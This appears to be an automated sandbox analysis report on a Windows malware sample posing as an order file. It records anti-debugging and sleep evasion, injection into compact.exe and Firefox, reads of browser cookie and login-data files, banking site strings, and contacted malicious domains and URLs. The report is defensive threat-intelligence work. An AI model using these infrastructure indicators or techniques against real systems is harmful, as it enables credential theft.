Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888	Thread sleep time: -38000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed

Source: N77o9w1836.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: N77o9w1836.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: N77o9w1836.10.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: N77o9w1836.10.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: N77o9w1836.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: N77o9w1836.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: N77o9w1836.10.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000000E.00000002.2792349246.0000019DA522D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: N77o9w1836.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: N77o9w1836.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4569047335.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: N77o9w1836.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: N77o9w1836.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: compact.exe, 0000000A.00000002.4565290385.00000000030ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq'Vh
Source: N77o9w1836.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: N77o9w1836.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: N77o9w1836.10.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: N77o9w1836.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: N77o9w1836.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: N77o9w1836.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: N77o9w1836.10.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: N77o9w1836.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: N77o9w1836.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: N77o9w1836.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: N77o9w1836.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: N77o9w1836.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Windows Analysis Report Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Malware Threat Intel
Provided by

Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Queries volume information: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.74.211	ghs.google.com	United States	15169	GOOGLEUS	false
144.208.124.10	superunicornpalace.com	United States	395092	SHOCK-1US	false
64.190.62.22	www.hondamechanic.today	United States	11696	NBS11696US	false
203.161.49.220	www.hellokong.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
208.91.197.13	www.mengistiebethlehem.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
162.43.101.114	www.tedjp-x.com	United States	11333	CYBERTRAILSUS	false
217.160.0.84	www.architect-usschool.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
89.31.76.10	sitestudio.it	Italy	24994	GENESYS-ASIT	false
188.114.96.3	www.ad14.fun	European Union	13335	CLOUDFLARENETUS	false
45.113.122.18	3cubesinterior.in	India	394695	PUBLIC-DOMAIN-REGISTRYUS	false
192.185.208.8	epicbazaarhub.com	United States	46606	UNIFIEDLAYER-AS-1US	false
121.254.178.230	www.rz6grmvv.shop	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false

Name	Malicious	Antivirus Detection	Reputation
http://www.hellokong.xyz/oui5/	false	Avira URL Cloud: safe	unknown
http://www.architect-usschool.com/s24g/	true	Avira URL Cloud: malware	unknown
http://www.artvectorcraft.store/s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8j	false	Avira URL Cloud: safe	unknown
http://www.epicbazaarhub.com/2769/	false	Avira URL Cloud: safe	unknown
